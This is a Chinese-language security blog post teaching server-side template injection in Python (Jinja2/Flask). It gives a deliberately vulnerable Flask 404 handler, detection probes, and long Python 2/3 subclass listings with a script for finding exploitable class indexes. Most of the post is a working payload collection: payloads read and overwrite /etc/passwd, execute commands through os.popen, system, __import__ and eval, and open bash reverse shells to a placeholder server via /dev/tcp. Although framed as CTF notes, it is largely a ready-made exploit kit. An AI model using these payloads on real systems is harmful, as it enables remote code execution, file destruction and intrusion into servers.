Zephyr's Repository
Zephyr
2022-07-05
目录

SSTI模板注入

# SSTI模板注入

# 说明

SSTI服务器端模板注入(Server-Side Template Injection),与SQL注入、XSS注入等相同,都是从用户获取一个输入,由于代码不规范或信任了用户输入,后端的渲染处理上进行了语句的拼接,而导致了服务端模板注入。

SSTI利用的是网站模板引擎,主要针对pythonphpjava的一些网站处理框架,比如Pythonjinja2makotornadodjangophpsmarty twigjavajadevelocity,当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。

# 例子:Flask

from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string
app = Flask(__name__)
@app.errorhandler(404)
def page_not_found(e):
    template = '''
        <div class="center-content error">
            <h1>Oops! That page doesn't exist.</h1>
            <h3>%s</h3>
        </div> 
    ''' %(request.url)
    return render_template_string(template),404

if __name__ == '__main__':
    app.run(debug=True)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

request.url参数用户可控,可注入代码,在进行目标编译渲染的过程中,执行了插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。

# SSTI模板引擎的检测

发送类似下面的payload,不同模板语法有一些差异

smarty=Hello ${7*7}
Hello 49
twig=Hello {{7*7}}
Hello 49
twig=Hello {{7*'7'}}
Hello 49
Jinja2=Hello {{7*'7'}}
Hello 7777777
1
2
3
4
5
6
7
8

检测到模板注入漏洞后,需要准确识别模板引擎的类型。神器Burpsuite 自带检测功能,并对不同模板接受的 payload 做了一个分类,并以此快速判断模板引擎

ssti1

# 利用

# Python

# 基础知识
# 名称空间

Python 的名称空间是从名称到对象的映射,在 Python 程序的执行过程中至少会存在两个名称空间

  • 内建名称空间:Python 自带的名字,在 Python 解释器启动时产生,存放一些 Python 内置的名字
  • 全局名称空间:在执行文件时,存放文件级别定义的名字
  • 局部名称空间(可能不存在):在执行文件的过程中,如果调用了函数,则会产生该函数的名称空间,用来存放该函数内定义的名字,该名字在函数调用时生效,调用结束后失效

加载顺序:内置名称空间 —> 全局名称空间 —> 局部名称空间

查找顺序:局部名称空间 —> 全局名称空间 —> 内置名称空间

# 继承

  • 构造 Python-SSTIPayload 需要类继承

  • Python 中一切均为对象,均继承于 object 对象,Pythonobject类中集成了很多的基础函数,假如需要在 Payload 中使用某个函数就需要用 object 去操作

  • 常见的继承关系的方法有以下三种:

    • base:对象的一个基类,一般情况下是 object
    • mro:获取对象的基类,只是这时会显示出整个继承链的关系,是一个列表,object 在最底层所以在列表中的最后,通过 mro[-1] 可以获取到
    • subclasses():继承此对象的子类,返回一个列表

  • 攻击方式为:变量 -> 对象 -> 基类 -> 子类遍历 -> 全局变量

# Python2子类
>>> for i in enumerate(().__class__.__bases__[0].__subclasses__()): print(i)
...
(0, <type 'type'>)
(1, <type 'weakref'>)
(2, <type 'weakcallableproxy'>)
(3, <type 'weakproxy'>)
(4, <type 'int'>)
(5, <type 'basestring'>)
(6, <type 'bytearray'>)
(7, <type 'list'>)
(8, <type 'NoneType'>)
(9, <type 'NotImplementedType'>)
(10, <type 'traceback'>)
(11, <type 'super'>)
(12, <type 'xrange'>)
(13, <type 'dict'>)
(14, <type 'set'>)
(15, <type 'slice'>)
(16, <type 'staticmethod'>)
(17, <type 'complex'>)
(18, <type 'float'>)
(19, <type 'buffer'>)
(20, <type 'long'>)
(21, <type 'frozenset'>)
(22, <type 'property'>)
(23, <type 'memoryview'>)
(24, <type 'tuple'>)
(25, <type 'enumerate'>)
(26, <type 'reversed'>)
(27, <type 'code'>)
(28, <type 'frame'>)
(29, <type 'builtin_function_or_method'>)
(30, <type 'instancemethod'>)
(31, <type 'function'>)
(32, <type 'classobj'>)
(33, <type 'dictproxy'>)
(34, <type 'generator'>)
(35, <type 'getset_descriptor'>)
(36, <type 'wrapper_descriptor'>)
(37, <type 'instance'>)
(38, <type 'ellipsis'>)
(39, <type 'member_descriptor'>)
(40, <type 'file'>)
(41, <type 'PyCapsule'>)
(42, <type 'cell'>)
(43, <type 'callable-iterator'>)
(44, <type 'iterator'>)
(45, <type 'sys.long_info'>)
(46, <type 'sys.float_info'>)
(47, <type 'EncodingMap'>)
(48, <type 'fieldnameiterator'>)
(49, <type 'formatteriterator'>)
(50, <type 'sys.version_info'>)
(51, <type 'sys.flags'>)
(52, <type 'exceptions.BaseException'>)
(53, <type 'module'>)
(54, <type 'imp.NullImporter'>)
(55, <type 'zipimport.zipimporter'>)
(56, <type 'posix.stat_result'>)
(57, <type 'posix.statvfs_result'>)
(58, <class 'warnings.WarningMessage'>)
(59, <class 'warnings.catch_warnings'>)
(60, <class '_weakrefset._IterationGuard'>)
(61, <class '_weakrefset.WeakSet'>)
(62, <class '_abcoll.Hashable'>)
(63, <type 'classmethod'>)
(64, <class '_abcoll.Iterable'>)
(65, <class '_abcoll.Sized'>)
(66, <class '_abcoll.Container'>)
(67, <class '_abcoll.Callable'>)
(68, <type 'dict_keys'>)
(69, <type 'dict_items'>)
(70, <type 'dict_values'>)
(71, <class 'site._Printer'>)
(72, <class 'site._Helper'>)
(73, <type '_sre.SRE_Pattern'>)
(74, <type '_sre.SRE_Match'>)
(75, <type '_sre.SRE_Scanner'>)
(76, <class 'site.Quitter'>)
(77, <class 'codecs.IncrementalEncoder'>)
(78, <class 'codecs.IncrementalDecoder'>)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
# Python3子类
>>> for i in enumerate(().__class__.__bases__[0].__subclasses__()): print(i)
...
(0, <class 'type'>)
(1, <class 'weakref'>)
(2, <class 'weakcallableproxy'>)
(3, <class 'weakproxy'>)
(4, <class 'int'>)
(5, <class 'bytearray'>)
(6, <class 'bytes'>)
(7, <class 'list'>)
(8, <class 'NoneType'>)
(9, <class 'NotImplementedType'>)
(10, <class 'traceback'>)
(11, <class 'super'>)
(12, <class 'range'>)
(13, <class 'dict'>)
(14, <class 'dict_keys'>)
(15, <class 'dict_values'>)
(16, <class 'dict_items'>)
(17, <class 'odict_iterator'>)
(18, <class 'set'>)
(19, <class 'str'>)
(20, <class 'slice'>)
(21, <class 'staticmethod'>)
(22, <class 'complex'>)
(23, <class 'float'>)
(24, <class 'frozenset'>)
(25, <class 'property'>)
(26, <class 'managedbuffer'>)
(27, <class 'memoryview'>)
(28, <class 'tuple'>)
(29, <class 'enumerate'>)
(30, <class 'reversed'>)
(31, <class 'stderrprinter'>)
(32, <class 'code'>)
(33, <class 'frame'>)
(34, <class 'builtin_function_or_method'>)
(35, <class 'method'>)
(36, <class 'function'>)
(37, <class 'mappingproxy'>)
(38, <class 'generator'>)
(39, <class 'getset_descriptor'>)
(40, <class 'wrapper_descriptor'>)
(41, <class 'method-wrapper'>)
(42, <class 'ellipsis'>)
(43, <class 'member_descriptor'>)
(44, <class 'types.SimpleNamespace'>)
(45, <class 'PyCapsule'>)
(46, <class 'longrange_iterator'>)
(47, <class 'cell'>)
(48, <class 'instancemethod'>)
(49, <class 'classmethod_descriptor'>)
(50, <class 'method_descriptor'>)
(51, <class 'callable_iterator'>)
(52, <class 'iterator'>)
(53, <class 'coroutine'>)
(54, <class 'coroutine_wrapper'>)
(55, <class 'EncodingMap'>)
(56, <class 'fieldnameiterator'>)
(57, <class 'formatteriterator'>)
(58, <class 'filter'>)
(59, <class 'map'>)
(60, <class 'zip'>)
(61, <class 'moduledef'>)
(62, <class 'module'>)
(63, <class 'BaseException'>)
(64, <class '_frozen_importlib._ModuleLock'>)
(65, <class '_frozen_importlib._DummyModuleLock'>)
(66, <class '_frozen_importlib._ModuleLockManager'>)
(67, <class '_frozen_importlib._installed_safely'>)
(68, <class '_frozen_importlib.ModuleSpec'>)
(69, <class '_frozen_importlib.BuiltinImporter'>)
(70, <class 'classmethod'>)
(71, <class '_frozen_importlib.FrozenImporter'>)
(72, <class '_frozen_importlib._ImportLockContext'>)
(73, <class '_thread._localdummy'>)
(74, <class '_thread._local'>)
(75, <class '_thread.lock'>)
(76, <class '_thread.RLock'>)
(77, <class '_frozen_importlib_external.WindowsRegistryFinder'>)
(78, <class '_frozen_importlib_external._LoaderBasics'>)
(79, <class '_frozen_importlib_external.FileLoader'>)
(80, <class '_frozen_importlib_external._NamespacePath'>)
(81, <class '_frozen_importlib_external._NamespaceLoader'>)
(82, <class '_frozen_importlib_external.PathFinder'>)
(83, <class '_frozen_importlib_external.FileFinder'>)
(84, <class '_io._IOBase'>)
(85, <class '_io._BytesIOBuffer'>)
(86, <class '_io.IncrementalNewlineDecoder'>)
(87, <class 'posix.ScandirIterator'>)
(88, <class 'posix.DirEntry'>)
(89, <class 'zipimport.zipimporter'>)
(90, <class 'codecs.Codec'>)
(91, <class 'codecs.IncrementalEncoder'>)
(92, <class 'codecs.IncrementalDecoder'>)
(93, <class 'codecs.StreamReaderWriter'>)
(94, <class 'codecs.StreamRecoder'>)
(95, <class '_weakrefset._IterationGuard'>)
(96, <class '_weakrefset.WeakSet'>)
(97, <class 'abc.ABC'>)
(98, <class 'collections.abc.Hashable'>)
(99, <class 'collections.abc.Awaitable'>)
(100, <class 'collections.abc.AsyncIterable'>)
(101, <class 'async_generator'>)
(102, <class 'collections.abc.Iterable'>)
(103, <class 'bytes_iterator'>)
(104, <class 'bytearray_iterator'>)
(105, <class 'dict_keyiterator'>)
(106, <class 'dict_valueiterator'>)
(107, <class 'dict_itemiterator'>)
(108, <class 'list_iterator'>)
(109, <class 'list_reverseiterator'>)
(110, <class 'range_iterator'>)
(111, <class 'set_iterator'>)
(112, <class 'str_iterator'>)
(113, <class 'tuple_iterator'>)
(114, <class 'collections.abc.Sized'>)
(115, <class 'collections.abc.Container'>)
(116, <class 'collections.abc.Callable'>)
(117, <class 'os._wrap_close'>)
(118, <class '_sitebuiltins.Quitter'>)
(119, <class '_sitebuiltins._Printer'>)
(120, <class '_sitebuiltins._Helper'>)
(121, <class 'types.DynamicClassAttribute'>)
(122, <class 'functools.partial'>)
(123, <class 'functools._lru_cache_wrapper'>)
(124, <class 'operator.itemgetter'>)
(125, <class 'operator.attrgetter'>)
(126, <class 'operator.methodcaller'>)
(127, <class 'itertools.accumulate'>)
(128, <class 'itertools.combinations'>)
(129, <class 'itertools.combinations_with_replacement'>)
(130, <class 'itertools.cycle'>)
(131, <class 'itertools.dropwhile'>)
(132, <class 'itertools.takewhile'>)
(133, <class 'itertools.islice'>)
(134, <class 'itertools.starmap'>)
(135, <class 'itertools.chain'>)
(136, <class 'itertools.compress'>)
(137, <class 'itertools.filterfalse'>)
(138, <class 'itertools.count'>)
(139, <class 'itertools.zip_longest'>)
(140, <class 'itertools.permutations'>)
(141, <class 'itertools.product'>)
(142, <class 'itertools.repeat'>)
(143, <class 'itertools.groupby'>)
(144, <class 'itertools._grouper'>)
(145, <class 'itertools._tee'>)
(146, <class 'itertools._tee_dataobject'>)
(147, <class 'reprlib.Repr'>)
(148, <class 'collections.deque'>)
(149, <class '_collections._deque_iterator'>)
(150, <class '_collections._deque_reverse_iterator'>)
(151, <class 'collections._Link'>)
(152, <class 'weakref.finalize._Info'>)
(153, <class 'weakref.finalize'>)
(154, <class 'functools.partialmethod'>)
(155, <class 'types._GeneratorWrapper'>)
(156, <class 'warnings.WarningMessage'>)
(157, <class 'warnings.catch_warnings'>)
(158, <class 'importlib.abc.Finder'>)
(159, <class 'importlib.abc.Loader'>)
(160, <class 'contextlib.ContextDecorator'>)
(161, <class 'rlcompleter.Completer'>)
(162, <class 'apt_pkg.Configuration'>)
(163, <class 'pkgCacheFile'>)
(164, <class 'apt_pkg.TagSection'>)
(165, <class 'apt_pkg.TagFile'>)
(166, <class 'apt_pkg.Tag'>)
(167, <class 'apt_pkg.Acquire'>)
(168, <class 'apt_pkg.AcquireItem'>)
(169, <class 'apt_pkg.AcquireWorker'>)
(170, <class 'apt_pkg.Cache'>)
(171, <class 'apt_pkg.Dependency'>)
(172, <class 'apt_pkg.Description'>)
(173, <class 'apt_pkg.PackageFile'>)
(174, <class 'apt_pkg.PackageList'>)
(175, <class 'apt_pkg.DependencyList'>)
(176, <class 'apt_pkg.Package'>)
(177, <class 'apt_pkg.Version'>)
(178, <class 'apt_pkg.Group'>)
(179, <class 'apt_pkg.GroupList'>)
(180, <class 'apt_pkg.Cdrom'>)
(181, <class 'apt_pkg.ActionGroup'>)
(182, <class 'apt_pkg.DepCache'>)
(183, <class 'apt_pkg.ProblemResolver'>)
(184, <class 'apt_pkg.IndexFile'>)
(185, <class 'apt_pkg.MetaIndex'>)
(186, <class 'apt_pkg._PackageManager'>)
(187, <class 'apt_pkg.PackageRecords'>)
(188, <class 'apt_pkg.SourceRecords'>)
(189, <class 'apt_pkg.SourceRecordFiles'>)
(190, <class 'apt_pkg.SourceList'>)
(191, <class 'apt_pkg.HashString'>)
(192, <class 'apt_pkg.Policy'>)
(193, <class 'apt_pkg.Hashes'>)
(194, <class 'apt_pkg.AcquireItemDesc'>)
(195, <class 'apt_pkg.SystemLock'>)
(196, <class 'apt_pkg.FileLock'>)
(197, <class 'apt_pkg.OrderList'>)
(198, <class 'apt_pkg.HashStringList'>)
(199, <class 'enum.auto'>)
(200, <enum 'Enum'>)
(201, <class '_sre.SRE_Pattern'>)
(202, <class '_sre.SRE_Match'>)
(203, <class '_sre.SRE_Scanner'>)
(204, <class 'sre_parse.Pattern'>)
(205, <class 'sre_parse.SubPattern'>)
(206, <class 'sre_parse.Tokenizer'>)
(207, <class 're.Scanner'>)
(208, <class 'tokenize.Untokenizer'>)
(209, <class 'traceback.FrameSummary'>)
(210, <class 'traceback.TracebackException'>)
(211, <class 'select.poll'>)
(212, <class 'select.epoll'>)
(213, <class 'selectors.BaseSelector'>)
(214, <class 'threading._RLock'>)
(215, <class 'threading.Condition'>)
(216, <class 'threading.Semaphore'>)
(217, <class 'threading.Event'>)
(218, <class 'threading.Barrier'>)
(219, <class 'threading.Thread'>)
(220, <class 'subprocess.CompletedProcess'>)
(221, <class 'subprocess.Popen'>)
(222, <class 'zlib.Compress'>)
(223, <class 'zlib.Decompress'>)
(224, <class '_bz2.BZ2Compressor'>)
(225, <class '_bz2.BZ2Decompressor'>)
(226, <class '_lzma.LZMACompressor'>)
(227, <class '_lzma.LZMADecompressor'>)
(228, <class '_hashlib.HASH'>)
(229, <class '_blake2.blake2b'>)
(230, <class '_blake2.blake2s'>)
(231, <class '_sha3.sha3_224'>)
(232, <class '_sha3.sha3_256'>)
(233, <class '_sha3.sha3_384'>)
(234, <class '_sha3.sha3_512'>)
(235, <class '_sha3.shake_128'>)
(236, <class '_sha3.shake_256'>)
(237, <class '_random.Random'>)
(238, <class 'tempfile._RandomNameSequence'>)
(239, <class 'tempfile._TemporaryFileCloser'>)
(240, <class 'tempfile._TemporaryFileWrapper'>)
(241, <class 'tempfile.SpooledTemporaryFile'>)
(242, <class 'tempfile.TemporaryDirectory'>)
(243, <class 'imp.NullImporter'>)
(244, <class 'imp._HackedGetData'>)
(245, <class 'xml.dom.Node'>)
(246, <class 'xml.dom.UserDataHandler'>)
(247, <class 'xml.dom.NodeFilter.NodeFilter'>)
(248, <class 'xml.dom.xmlbuilder.Options'>)
(249, <class 'xml.dom.xmlbuilder.DOMBuilder'>)
(250, <class 'xml.dom.xmlbuilder.DOMEntityResolver'>)
(251, <class 'xml.dom.xmlbuilder.DOMInputSource'>)
(252, <class 'xml.dom.xmlbuilder.DOMBuilderFilter'>)
(253, <class 'xml.dom.xmlbuilder._AsyncDeprecatedProperty'>)
(254, <class 'xml.dom.xmlbuilder.DocumentLS'>)
(255, <class 'xml.dom.xmlbuilder.DOMImplementationLS'>)
(256, <class 'xml.dom.minidom.NamedNodeMap'>)
(257, <class 'xml.dom.minidom.TypeInfo'>)
(258, <class 'xml.dom.minidom.Childless'>)
(259, <class 'xml.dom.minidom.ReadOnlySequentialNamedNodeMap'>)
(260, <class 'xml.dom.minidom.Identified'>)
(261, <class 'xml.dom.minidom.ElementInfo'>)
(262, <class 'pyexpat.xmlparser'>)
(263, <class 'Struct'>)
(264, <class 'string.Template'>)
(265, <class 'string.Formatter'>)
(266, <class 'email.charset.Charset'>)
(267, <class 'email.header.Header'>)
(268, <class 'email.header._ValueFormatter'>)
(269, <class '_socket.socket'>)
(270, <class 'datetime.date'>)
(271, <class 'datetime.timedelta'>)
(272, <class 'datetime.time'>)
(273, <class 'datetime.tzinfo'>)
(274, <class 'urllib.parse._ResultMixinStr'>)
(275, <class 'urllib.parse._ResultMixinBytes'>)
(276, <class 'urllib.parse._NetlocResultMixinBase'>)
(277, <class 'calendar._localized_month'>)
(278, <class 'calendar._localized_day'>)
(279, <class 'calendar.Calendar'>)
(280, <class 'calendar.different_locale'>)
(281, <class 'email._parseaddr.AddrlistClass'>)
(282, <class 'email._policybase._PolicyBase'>)
(283, <class 'email.feedparser.BufferedSubFile'>)
(284, <class 'email.feedparser.FeedParser'>)
(285, <class 'email.parser.Parser'>)
(286, <class 'email.parser.BytesParser'>)
(287, <class 'email.message.Message'>)
(288, <class 'http.client.HTTPConnection'>)
(289, <class 'ipaddress._IPAddressBase'>)
(290, <class 'ipaddress._BaseV4'>)
(291, <class 'ipaddress._IPv4Constants'>)
(292, <class 'ipaddress._BaseV6'>)
(293, <class 'ipaddress._IPv6Constants'>)
(294, <class 'textwrap.TextWrapper'>)
(295, <class '_ssl._SSLContext'>)
(296, <class '_ssl._SSLSocket'>)
(297, <class '_ssl.MemoryBIO'>)
(298, <class '_ssl.Session'>)
(299, <class 'ssl.SSLObject'>)
(300, <class 'urllib.request.Request'>)
(301, <class 'urllib.request.OpenerDirector'>)
(302, <class 'urllib.request.BaseHandler'>)
(303, <class 'urllib.request.HTTPPasswordMgr'>)
(304, <class 'urllib.request.AbstractBasicAuthHandler'>)
(305, <class 'urllib.request.AbstractDigestAuthHandler'>)
(306, <class 'urllib.request.URLopener'>)
(307, <class 'urllib.request.ftpwrapper'>)
(308, <class 'gzip._PaddedFile'>)
(309, <class 'email.headerregistry.Address'>)
(310, <class 'email.headerregistry.Group'>)
(311, <class 'email.headerregistry.UnstructuredHeader'>)
(312, <class 'email.headerregistry.DateHeader'>)
(313, <class 'email.headerregistry.AddressHeader'>)
(314, <class 'email.headerregistry.MIMEVersionHeader'>)
(315, <class 'email.headerregistry.ParameterizedMIMEHeader'>)
(316, <class 'email.headerregistry.ContentTransferEncodingHeader'>)
(317, <class 'email.headerregistry.HeaderRegistry'>)
(318, <class 'email.contentmanager.ContentManager'>)
(319, <class 'problem_report.CompressedValue'>)
(320, <class 'configparser.Interpolation'>)
(321, <class '_json.Scanner'>)
(322, <class '_json.Encoder'>)
(323, <class 'json.decoder.JSONDecoder'>)
(324, <class 'json.encoder.JSONEncoder'>)
(325, <class '__future__._Feature'>)
(326, <class 'logging.LogRecord'>)
(327, <class 'logging.PercentStyle'>)
(328, <class 'logging.Formatter'>)
(329, <class 'logging.BufferingFormatter'>)
(330, <class 'logging.Filter'>)
(331, <class 'logging.Filterer'>)
(332, <class 'logging.PlaceHolder'>)
(333, <class 'logging.Manager'>)
(334, <class 'logging.LoggerAdapter'>)
(335, typing._TypingBase)
(336, typing.Generic)
(337, <class 'typing._TypingEmpty'>)
(338, <class 'typing._TypingEllipsis'>)
(339, typing.Protocol)
(340, typing.Generic[+T_co])
(341, typing.Generic[+T_co, -T_contra, +V_co])
(342, typing.Protocol[+T_co])
(343, typing.Generic[~KT, +VT_co])
(344, typing.Generic[+T_co, -T_contra])
(345, typing.Generic[+CT_co])
(346, <class 'typing.NamedTuple'>)
(347, typing.Generic[~AnyStr])
(348, <class 'typing.io'>)
(349, <class 'typing.re'>)
(350, <class 'apt.progress.base.AcquireProgress'>)
(351, <class 'apt.progress.base.CdromProgress'>)
(352, <class 'apt.progress.base.InstallProgress'>)
(353, <class 'apt.progress.base.OpProgress'>)
(354, <class 'apt.progress.text.TextProgress'>)
(355, <class 'apt.package.BaseDependency'>)
(356, <class 'apt.package.Origin'>)
(357, <class 'apt.package.Version'>)
(358, <class 'apt.package.Package'>)
(359, <class 'apt.cache._WrappedLock'>)
(360, <class 'apt.cache.Cache'>)
(361, <class 'apt.cache.ProblemResolver'>)
(362, <class 'apt.cache.Filter'>)
(363, <class 'apt.cache._FilteredCacheHelper'>)
(364, <class 'apt.cache.FilteredCache'>)
(365, <class 'pickle._Framer'>)
(366, <class 'pickle._Unframer'>)
(367, <class 'pickle._Pickler'>)
(368, <class 'pickle._Unpickler'>)
(369, <class '_pickle.Unpickler'>)
(370, <class '_pickle.Pickler'>)
(371, <class '_pickle.Pdata'>)
(372, <class '_pickle.PicklerMemoProxy'>)
(373, <class '_pickle.UnpicklerMemoProxy'>)
(374, <class 'apport.packaging.PackageInfo'>)
(375, <class 'gettext.NullTranslations'>)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
# 攻击步骤

  1. 使用strlisttupledict等获取基本类

    对于返回的是定义的Class类的话:
__dict__          //返回类中的函数和属性,父类子类互不影响
__base__          //返回类的父类 python3
__mro__           //返回类继承的元组,(寻找父类) python3
__init__          //返回类的初始化方法   
__subclasses__()  //返回类中仍然可用的引用  python3
__globals__       //对包含函数全局变量的字典的引用 python3

对于返回的是类实例的话:
__class__         //返回实例的对象,可以使类实例指向Class,使用上面的魔术方法
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10

    示例

    ''.__class__.__mro__[-1]
{}.__class__.__bases__[0]
().__class__.__bases__[0]
[].__class__.__bases__[0]
    1
    2
    3
    4

  2. 继续向下获取基本类 (object) 的子类

    object.__subclasses__()
    1

  3. 找到重载过的__init__类(在获取初始化属性后,带 wrapper的说明没有重载,寻找不带 wrapper 的)

    >>> ''.__class__.__mro__[-1].__subclasses__()[99].__init__
<slot wrapper '__init__' of 'object' objects>
>>> ''.__class__.__mro__[-1].__subclasses__()[59].__init__
<unbound method WarningMessage.__init__>
    1
    2
    3
    4

  4. 查看其引用 __builtins__

    Python 程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于 builtins 却不用导入,它在任何模块都直接可见,所以这里直接调用引用的模块。

    # Python2
''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']
    1
    2

  5. 这里会返回 dict 类型,寻找 keys 中可用函数,直接调用即可,使用 keys 中的 file 以实现读取文件的功能

    # Python2
''.__class__.__mro__[-1].__subclasses__()[59].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()
    1
    2

  6. 也可以在子类列表中寻找可利用的类

    • 我们一般来说是先知晓一些可以getshell的类,然后再去跑这些类的索引,然后这里先讲述如何去跑索引

    • 这里先给出一个在本地遍历的脚本,原理是先遍历所有子类,然后再遍历子类的方法的所引用的东西,来搜索是否调用了我们所需要的方法,以popen为例子

    search='popen'
num=-1
for i in ''.__class__.__mro__[-1].__subclasses__():
    num+=1
    try:
        if search in i.__init__.__globals__.keys():
            print(i,num)
    except:
        pass
    1
    2
    3
    4
    5
    6
    7
    8
    9
    python3 find.py
<class 'os._wrap_close'> 117
    1
    2

    调用其中的popen来执行命令

    >>> [].__class__.__mro__[-1].__subclasses__()[117].__init__.__globals__['popen']('whoami').read()
'root\n'
    1
    2

    但是上面的方法仅限于在本地寻找,因为在做CTF题目的时候,我们无法在题目环境中运行这个find.py,这里用一个师傅的一个脚本直接去寻找子类

    • 首先把所有的子类列举出来
    for i in ().__class__.__bases__[0].__subclasses__(): print(i,end=",")
    1

    然后把子类列表放进下面脚本中的a中,然后寻找os._wrap_close这个类

    import json
a = """
<class 'type'>,...,<class 'subprocess.Popen'>
"""
num = 0
allList = []
result = ""
for i in a:
    if i == ">":
        result += i
        allList.append(result)
        result = ""
    elif i == "\n" or i == ",":
        continue
    else:
        result += i
for k,v in enumerate(allList):
    if "os._wrap_close" in v:
        print(str(k)+"--->"+v)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19

# Python2

# 利用file

注:仅Python2可用

读文件

''.__class__.__mro__[-1].__subclasses__()[40]('/etc/passwd').read()
1

写文件

''.__class__.__mro__[-1].__subclasses__()[40]('/etc/passwd','w').write('evil code')
1
# 利用linecache

find.py脚本中的search变量赋值为linecache,去寻找含有linecache的类

python2 find.py
(<class 'warnings.WarningMessage'>, 58)
(<class 'warnings.catch_warnings'>, 59)
1
2
3

命令执行

''.__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals['linecache'].os.popen('whoami').read()
1

反弹shell

().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__('func_global'+'s')['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('bash -c "bash -i >& /dev/tcp/xxxx/9999 0>&1"')
# 该Payload不能直接放在 URL 中执行 , 因为 & 的存在会导致 URL 解析出现错误,可以使用burp等工具
1
2
# 利用os模块中的systempopen

find.py脚本中的search变量赋值为os,去寻找含有os的类

python2 find.py
(<class 'site._Printer'>, 68)
(<class 'site.Quitter'>, 73)
1
2
3

popen

''.__class__.__mro__[-1].__subclasses__()[68].__init__.__globals__['os'].popen('whoami').read()
1

system

''.__class__.__mro__[-1].__subclasses__()[73].__init__.__globals__['os'].system('whoami')
1

反弹shell

''.__class__.__mro__[-1].__subclasses__()[68].__init__.__globals__['os'].popen('bash -i >& /dev/tcp/你的服务器地址/端口 0>&1').read()
# 该Payload不能直接放在 URL 中执行 , 因为 & 的存在会导致 URL 解析出现错误,可以使用burp等工具
1
2

# Python3

# 利用popen

同样find.py脚本中的search变量赋值为popen,去寻找含有popen的类

python3 find.py
<class 'os._wrap_close'> 117
1
2

命令执行

[].__class__.__mro__[-1].__subclasses__()[117].__init__.__globals__['popen']('whoami').read()
1
# 利用__import__导入其他模块

find.py脚本中的search变量修改为__import__,去寻找含有__import__的类


python3 find.py
<class '_frozen_importlib._ModuleLock'> 64
<class '_frozen_importlib._DummyModuleLock'> 65
<class '_frozen_importlib._ModuleLockManager'> 66
<class '_frozen_importlib._installed_safely'> 67
<class '_frozen_importlib.ModuleSpec'> 68
# 随便用一个就好
1
2
3
4
5
6
7
8

命令执行

# 导入os模块使用里面的popen进行命令执行
[].__class__.__mro__[-1].__subclasses__()[64].__init__.__globals__['__import__']('os').popen('whoami').read()
1
2

# 通用payload

# 利用__builtins__

原理就是找到含有__builtins__的类,然后利用

find.py脚本中的search变量赋值为__builtins__,去寻找含有__builtins__的类

python2 find.py
(<class 'warnings.WarningMessage'>, 58)
(<class 'warnings.catch_warnings'>, 59)
(<class '_weakrefset._IterationGuard'>, 60)
(<class '_weakrefset.WeakSet'>, 61)
(<class 'site._Printer'>, 68)
(<class 'site.Quitter'>, 73)
(<class 'codecs.IncrementalEncoder'>, 74)
(<class 'codecs.IncrementalDecoder'>, 75)

python3 find.py
<class '_frozen_importlib._ModuleLock'> 64
<class '_frozen_importlib._DummyModuleLock'> 65
<class '_frozen_importlib._ModuleLockManager'> 66
<class '_frozen_importlib._installed_safely'> 67
<class '_frozen_importlib.ModuleSpec'> 68
<class '_frozen_importlib_external.FileLoader'> 79
<class '_frozen_importlib_external._NamespacePath'> 80
<class '_frozen_importlib_external._NamespaceLoader'> 81
<class '_frozen_importlib_external.FileFinder'> 83
<class 'codecs.IncrementalEncoder'> 91
<class 'codecs.IncrementalDecoder'> 92
<class 'codecs.StreamReaderWriter'> 93
<class 'codecs.StreamRecoder'> 94
<class '_weakrefset._IterationGuard'> 95
<class '_weakrefset.WeakSet'> 96
<class 'os._wrap_close'> 117
<class '_sitebuiltins.Quitter'> 118
<class '_sitebuiltins._Printer'> 119
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

其下evalopen__import__等均可使用,常用__import__导入其他模块结合使用

读文件

[].__class__.__mro__[-1].__subclasses__()[68].__init__.__globals__['__builtins__']['open']('/etc/passwd').read()
1

写文件

[].__class__.__mro__[-1].__subclasses__()[68].__init__.__globals__['__builtins__']['open']('/etc/passwd','w').write("hack code")
1

命令执行

[].__class__.__mro__[-1].__subclasses__()[68].__init__.__globals__['__builtins__']['__import__']('os').system('whoami')
[].__class__.__mro__[-1].__subclasses__()[68].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')
1
2

